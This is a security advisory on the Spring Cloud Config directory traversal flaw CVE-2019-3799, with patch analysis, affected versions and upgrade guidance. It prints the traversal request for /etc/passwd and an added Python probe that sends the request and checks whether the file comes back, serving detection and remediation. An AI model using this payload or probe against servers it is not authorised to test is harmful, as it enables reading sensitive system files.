Alert: Spring Cloud Config Directory Traversal Vulnerability (CVE-2019-3799)

  • Source: SANGFOR Security Center
  • Date Published: 2019-04-20

Summary

About Spring

Spring is a layered, open-source application framework for Java/Java EE (with a .NET port) built around inversion of control (IoC) and aspect-oriented programming (AOP). It offers a modular MVC web layer, a unified API over the various data-access technologies, declarative transaction management, and bean wiring through IoC, which removes much of the property-file and helper-class plumbing that otherwise makes application code complex and hard to follow. It is very widely deployed. Spring Cloud Config, the project affected here, is the Spring Cloud module that provides server- and client-side support for externalized configuration; its config server serves property sources (for example, files held in a Git repository) to clients over HTTP.

Vulnerability Analysis

CVE-2019-3799 technical details: the spring-cloud-config-server module does not restrict the resource path it receives, so an attacker can chain ../ sequences in a request to step out of the configuration repository and read sensitive files elsewhere on the server, resulting in information disclosure.

Official Patches:

The official patch adds an isInvalidEncodedPath function that checks the inbound URL: if the path contains %, it is URL-decoded before being checked, so an attacker cannot hide ../ from the check by percent-encoding it.

The newly added isInvalidPath function checks the URL for the keywords WEB-INF, META-INF, .. and ../; a request containing any of them triggers a warning and is rejected.
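To make the two checks concrete, here is an added Python model of the logic the patch description above attributes to isInvalidPath and isInvalidEncodedPath. It is not the Spring Cloud Config source (which is Java): the clean_path helper approximates Spring's StringUtils.cleanPath, the request paths are constructed, and the second decode pass for double-encoded input is this example's own hardening rather than something the advisory describes.

```python
from urllib.parse import unquote


def clean_path(path: str) -> str:
    """Collapse '.' and 'segment/..' pairs but keep any '..' that climbs above
    the start of the path, approximating Spring's StringUtils.cleanPath.
    A leftover '../' after cleaning is what the traversal check looks for."""
    absolute = path.startswith("/")
    kept = []
    climbs = 0
    # Walk from the right so each '..' cancels the segment before it.
    for part in reversed(path.split("/")):
        if part in ("", "."):
            continue
        if part == "..":
            climbs += 1
        elif climbs:
            climbs -= 1
        else:
            kept.append(part)
    kept.extend([".."] * climbs)
    cleaned = "/".join(reversed(kept))
    return "/" + cleaned if absolute else cleaned


def is_invalid_path(path: str) -> bool:
    """Keyword check the advisory describes: reject WEB-INF and META-INF, and
    reject '..' when it still resolves to a parent-directory step."""
    if "WEB-INF" in path or "META-INF" in path:
        return True
    return ".." in path and "../" in clean_path(path)


def is_invalid_encoded_path(path: str) -> bool:
    """If the raw path contains '%', percent-decode it and re-run the keyword
    check, so %2e%2e%2f cannot hide '../' from a check on the raw string.
    The second decode (catches double-encoded %252e) is this example's addition."""
    if "%" not in path:
        return False
    decoded = unquote(path)
    if is_invalid_path(decoded):
        return True
    return is_invalid_path(unquote(decoded))


def classify(path: str) -> str:
    """Report which check rejects a request path, or 'ok' if neither does."""
    if is_invalid_path(path):
        return "rejected:raw"
    if is_invalid_encoded_path(path):
        return "rejected:decoded"
    return "ok"


# Constructed sample request paths (hypothetical app/profile/label test/pathtraversal/master).
SAMPLE_PATHS = [
    "/test/pathtraversal/master/../../../../../etc/passwd",               # the advisory's request
    "/test/pathtraversal/master/" + "%2e%2e%2f" * 5 + "etc/passwd",        # percent-encoded
    "/test/pathtraversal/master/" + "%252e%252e%252f" * 5 + "etc/passwd",  # double-encoded
    "/test/pathtraversal/master/WEB-INF/web.xml",                          # keyword match
    "/test/pathtraversal/master/application.yml",                          # legitimate
    "/test/pathtraversal/master/a..b.yml",                                 # '..' that is not a traversal
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{classify(p):17} {p}")
```

The a..b.yml case is why the check cleans the path before looking for ../ rather than rejecting any two consecutive dots: a filename containing .. is legitimate, a segment that still climbs out of the repository after cleaning is not.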

Vulnerability Reproduction

Download a vulnerable version of Spring Cloud Config from the following link:

https://github.com/spring-cloud/spring-cloud-config

Once the reproduction environment is up, send a GET request for /test/pathtraversal/master/../../../../../etc/passwd. On a Linux host the contents of the passwd file are returned, as shown below. Note that many HTTP clients collapse ../ before sending the request (curl needs --path-as-is), so use a client that sends the path literally.
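The reproduction request above, as an added example that is not part of the original advisory: a small Python checker that builds the traversal URL, sends it, and decides from the response body whether /etc/passwd came back. The fetch function is injectable so the decision logic can run offline against a constructed body; the base URL, the app/profile/label names and the depth of five ../ segments mirror the advisory's request but are otherwise assumptions.

```python
import re
import sys
from typing import Callable
from urllib.request import Request, urlopen


def build_probe_url(base_url: str, app: str = "test", profile: str = "pathtraversal",
                    label: str = "master", target: str = "etc/passwd", depth: int = 5) -> str:
    """Compose {base}/{app}/{profile}/{label}/ followed by `depth` literal '../'
    segments and the target file, as in the advisory's request (not percent-encoded)."""
    return f"{base_url.rstrip('/')}/{app}/{profile}/{label}/" + "../" * depth + target


# One line with the seven colon-separated fields of /etc/passwd.
PASSWD_LINE = re.compile(r"^[^:\n]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M)


def looks_like_passwd(body: str) -> bool:
    """True when the body has a passwd-shaped line and a root entry, which a
    JSON error page or an ordinary properties file will not."""
    return bool(PASSWD_LINE.search(body)) and re.search(r"^root:", body, re.M) is not None


def urllib_fetch(url: str) -> str:
    """Default fetcher. urllib sends the path as given and does not collapse '../'."""
    req = Request(url, headers={"User-Agent": "cve-2019-3799-check"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url: str, fetch: Callable[[str], str] = urllib_fetch) -> bool:
    """Return True only when the traversal request yields passwd content.
    Connection errors and non-2xx responses (urlopen raises on them) count as not vulnerable."""
    try:
        body = fetch(build_probe_url(base_url))
    except Exception:
        return False
    return looks_like_passwd(body)


# Constructed sample bodies for offline checks (not captured from a real server).
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
SAMPLE_ERROR = '{"status":404,"error":"Not Found","path":"/test/pathtraversal/master/etc/passwd"}'

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8888"
    print("vulnerable" if probe(target) else "not vulnerable (or request blocked)", target)
```

The body check deliberately requires passwd-shaped lines plus a root entry rather than a 200 status alone, because a patched server or an intervening proxy can also answer 200 with an error page.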

Impacts

Globally, over 50,000 Spring-based servers are exposed to the Internet, of which more than 28,000 are in China.

Affected Versions:

  • Spring Cloud Config 2.1.0 to 2.1.1
  • Spring Cloud Config 2.0.0 to 2.0.3
  • Spring Cloud Config 1.4.0 to 1.4.5

References

https://pivotal.io/security/cve-2019-3799


Solution

Sangfor Solution

Sangfor Security Cloud has been updated promptly and can now probe websites for this vulnerability to protect users.

Sangfor NGAF customers need only update the security capability database and enable the corresponding protection feature.

Remediation Solution

Spring has released fixed versions: 2.1.x users should upgrade to 2.1.2, 2.0.x users to 2.0.4 and 1.4.x users to 1.4.6. Download the fixed release from the following link: https://github.com/spring-cloud/spring-cloud-config/releases